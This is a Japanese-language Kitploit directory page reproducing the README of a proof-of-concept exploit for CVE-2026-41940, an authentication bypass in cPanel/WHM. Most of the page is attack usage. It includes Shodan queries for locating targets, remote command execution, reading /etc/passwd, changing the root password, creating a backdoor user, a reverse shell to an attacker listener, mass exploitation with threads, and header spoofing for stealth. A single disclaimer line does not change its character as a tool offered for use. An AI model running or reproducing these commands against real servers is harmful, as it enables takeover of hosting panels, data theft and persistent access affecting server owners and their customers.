Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41940-PoC-Exploit — 🚀 CVE-2026-41940 cPanel/WHM 認証バイパスエクスプロイト - ベストフロー 💥 CRLFインジェクションによる認証バイパス、セッションハイジャック、アカウント漏洩。 ✅ プロキシ、カスタムUA、キープアライブ、リトライ、SSL検証、カラー出力、ファイル保存対応。 ⚡ ペネトレーションテスター向けの高度なPoC。 | Kitploit
ツール/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
認証と認可特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトペネトレーションテストコマンド&コントロール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
レッドチーミング
ペイロード開発
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

🚀 CVE-2026-41940 cPanel/WHM 認証バイパスエクスプロイト - ベストフロー 💥 CRLFインジェクションによる認証バイパス、セッションハイジャック、アカウント漏洩。 ✅ プロキシ、カスタムUA、キープアライブ、リトライ、SSL検証、カラー出力、ファイル保存対応。 ⚡ ペネトレーションテスター向けの高度なPoC。

リポジトリを見る
9281ヶ月前未レビュー

CVE-2026-41940

🚀 CVE-2026-41940 - cPanel/WHM 認証バイパスエクスプロイト

Python License CVSS Pentesting

cPanel & WHM エディション - CRLFインジェクションによる認証バイパス&完全なセッションハイジャック

📌 概要

このエクスプロイトは、cPanel/WHM における重大な認証バイパス脆弱性である CVE-2026-41940 を悪用します。セッション管理システムに細工されたCRLFペイロードを注入することで、有効な認証情報を一切必要とせずに、セッションハイジャック、ルートアクセス、ホスティングパネルの完全な制御を達成します。

🔥 主な機能

カテゴリ機能
悪用✅ CRLFインジェクションによる認証バイパス
✅ WHMセッションハイジャック
✅ セキュリティトークンの漏洩
✅ 即時ルートアクセス
ポストエクスプロイテーション✅ アカウント一覧の取得(ユーザー+ドメイン)
✅ リモートコマンド実行(RCE)
✅ リバースシェル(netcat互換)
✅ ファイル読み取り(設定ファイル、ログなど)
✅ ルートパスワードの変更
✅ 新しいcPanelユーザーの作成
スキャン✅ 単一ターゲットの攻撃
✅ 複数ターゲットの一括スキャン
✅ マルチスレッド(スレッド数設定可能)
✅ ポート上書き対応
ステルス✅ リクエスト間のランダム遅延
✅ X-Forwarded-For スプーフィング
✅ カスタムUser-Agent対応
✅ プロキシ対応(HTTP/HTTPS)
ユーザビリティ✅ 対話型WHMシェル(-i)
✅ カラー出力(colorama)
✅ 詳細/デバッグモード
✅ アカウント一覧のファイル出力
✅ キープアライブセッションスレッド
✅ 不安定な接続向けリトライ機構

🎯 影響を受けるバージョン

📍 Shodan検索

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ 免責事項: このツールは、許可されたセキュリティテストおよび教育目的のみを対象としています。不正アクセスは違法です。

📦 インストール

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ 使用例

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 対話型シェルのコマンド

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

## 🔧 リモートコマンド実行

```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 リバースシェル

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 ポストエクスプロイテーション操作

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 一括攻撃(複数ターゲット)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ 詳細オプション

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 コマンドライン引数

🧪 テスト環境

Docker (if you want to test safely)

docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

Or with vulnerable version

docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 関連エクスプロイト

他のエクスプロイトリポジトリもご覧ください:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
ツールをダウンロード
製品
バージョン
ステータス
cPanel & WHM11.92 - 11.102✅ 確認済み
cPanel & WHM11.104 - 11.110✅ 確認済み
cPanel & WHM11.118 - 11.136⚠️ 限定的
cPanel & WHM< 11.86✅ 脆弱性の可能性あり
短縮長い形式説明デフォルト
-t--target単一ターゲットのURL必須(単一)
-l--target-fileターゲット一覧を含むファイル必須(一括)
-p--portポートの上書き自動検出
-o--outputアカウント一覧をファイルに保存なし
-v--verboseデバッグ出力を有効化無効
-i--interactive対話型WHMシェル無効
--proxyHTTP/HTTPSプロキシなし
-ua--user-agentカスタムUser-Agentランダム
--cmd単一コマンドを実行なし
--reverse-shellリバースシェル IP:PORTなし
--passwdルートパスワードを変更なし
--adduser新規ユーザーの作成(USER DOMAIN PASS)なし
--readターゲットからファイルを読み取るなし
--threads一括スキャンのスレッド数10
--delayキープアライブ間隔(秒)3.0
--max-retriesリクエストごとの最大リトライ回数3
--no-keep-aliveセッションを維持しない無効
--ssl-verifySSL証明書を検証無効